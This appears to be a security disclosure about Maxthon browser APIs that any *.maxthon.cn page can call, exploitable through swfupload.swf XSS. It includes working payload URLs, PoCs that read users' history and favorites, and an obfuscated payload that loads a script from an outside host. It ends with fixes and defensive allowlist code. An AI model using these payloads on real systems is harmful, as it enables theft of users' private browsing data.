A design defect in the Maxthon (Ao you) browser may allow sensitive information such as the user's favorites and browsing history to be read.
A series of problems caused by design defects
For the sake of user experience, the browser allows pages under the *.maxthon.cn domain to call certain privileged APIs. For example, to change the home page:
maxthon.browser.config.ConfigManager.set("maxthon.config", "browser.general.startpage", "http://wooyun.org");
Any page on *.maxthon.cn can call the API above.
Plug-ins can also be installed through external.mxCall.
But is that all? In fact, I found that, apart from i.maxthon.cn, any *.maxthon.cn host can read the browsing history, as long as a corresponding XSS can be obtained.
Of course, this is certainly not limited to the history; favorites are affected as well. Here I provide two PoC demos. I hope Maxthon will reconsider the API permissions in future versions, so that an XSS on any *.maxthon.cn host cannot read sensitive information such as your favorites and browsing history.
Both XSSes are Flash-based, so they are not blocked by the browser:
http://my.maxthon.cn//public/images/swfupload.swf?MovieName=aaa%22])}catch(e){if(!window.x){window.x=1;alert(1)}};//
http://skin.maxthon.cn//swfupload/swfupload.swf?MovieName=aaa%22])}catch(e){if(!window.x){window.x=1;alert(1)}};//
History-reading PoC:
http://my.maxthon.cn//public/images/swfupload.swf?MovieName=aaa%22])}catch(e){if(!window.x){window.x=1;alert(JSON.stringify(maxthon.browser.history.HistoryManager.getLastOpenList()));}};//
Favorites-reading PoC:
// Enumerate the user's most-visited favorites and print each URL
var nodes = maxthon.browser.favorites.FavManager.getMostVisitNodes();
for (var i = 0; i < nodes.length; i++) {
    console.log(nodes[i].url_);
}
URL:
http://my.maxthon.cn//public/images/swfupload.swf?MovieName=aaa%22])}catch(e){if(!window.x){window.x=1;eval('window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,47,119,117,116,111,110,103,121,117,46,105,110,102,111,47,109,97,120,116,104,111,110,46,106,115,);document.body.appendChild(window.s)')}};//
The effect is as follows:
Solution:
Fix the XSS. The swfupload.swf here can be replaced with the one at http://bbs.open.qq.com/static/image/common/swfupload.swf to close the XSS.
Adjust the privilege policy so that an XSS on any sub-site cannot affect users' favorites, browsing history, or other sensitive information.
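As an added illustration of the two fixes above (this is example code written for this page, not Maxthon's code and not swfupload's), the block below contrasts the wildcard "*.maxthon.cn" rule from the report with an exact-origin, per-API allowlist, and adds the kind of conservative parameter validation that stops a reflected SWF parameter from breaking out into script. The host name trusted-host.maxthon.cn, the API keys, the policy table and the favorites stub are all assumptions made for the example; skin.maxthon.cn is taken from the report.

```javascript
// Added example (not Maxthon's or swfupload's code). Origins, API keys and the
// policy table are assumptions made for illustration.

// Hypothetical policy: each privileged API lists the exact origins allowed to
// call it. No wildcard entries, so an XSS on an unrelated sub-site (a skin or
// upload host) gains no access to history or favorites.
const API_POLICY = {
  "config.set": ["https://trusted-host.maxthon.cn"],                 // placeholder origin
  "history.getLastOpenList": ["https://trusted-host.maxthon.cn"],    // placeholder origin
  "favorites.getMostVisitNodes": ["https://trusted-host.maxthon.cn"] // placeholder origin
};

// The rule described in the report: any *.maxthon.cn page may call any
// privileged API. Kept here only to show what the hardened rule changes.
function legacyWildcardAllows(origin) {
  let host;
  try { host = new URL(origin).hostname; } catch (e) { return false; }
  return host === "maxthon.cn" || host.endsWith(".maxthon.cn");
}

// Hardened rule: the caller's origin (scheme + host + port as the browser
// reports it) must appear verbatim in that API's allowlist, over https only.
function isAllowed(api, origin) {
  const allowed = API_POLICY[api];
  if (!allowed) return false;               // unknown API: deny by default
  let normalized;
  try {
    const u = new URL(origin);
    if (u.protocol !== "https:") return false; // no privilege for plain http
    normalized = u.origin;                     // strips path, query, fragment
  } catch (e) {
    return false;                              // unparsable origin: deny
  }
  return allowed.includes(normalized);
}

// Wrapper a browser shell could place in front of each privileged function.
function guardedCall(api, callerOrigin, impl, ...args) {
  if (!isAllowed(api, callerOrigin)) {
    throw new Error("privileged API " + api + " denied for origin " + callerOrigin);
  }
  return impl(...args);
}

// Input validation for a value that is reflected into a script context (the
// MovieName parameter in the report): accept only a short identifier charset,
// so characters such as quotes, brackets and braces can never reach the page.
// This is an assumed rule for the example, not swfupload's own check.
function isSafeMovieName(value) {
  return typeof value === "string" && /^[A-Za-z0-9_]{1,64}$/.test(value);
}

// Constructed demonstration: the same favorites call attempted from several
// origins, evaluated under both rules. The favorites list is a stub.
function demo() {
  const fakeFavorites = () => [{ url_: "https://example.test/" }]; // constructed stub
  const origins = [
    "https://trusted-host.maxthon.cn",
    "https://skin.maxthon.cn",
    "http://trusted-host.maxthon.cn"
  ];
  const results = {};
  for (const origin of origins) {
    let hardenedResult;
    try {
      hardenedResult = guardedCall("favorites.getMostVisitNodes", origin, fakeFavorites).length;
    } catch (e) {
      hardenedResult = "denied";
    }
    results[origin] = { legacy: legacyWildcardAllows(origin), hardened: hardenedResult };
  }
  return results;
}
```

Under the wildcard rule every origin in demo() passes; under the exact-origin rule only the placeholder trusted host over https gets the favorites list, and the MovieName check rejects any value containing the `"])}` characters the PoC relies on.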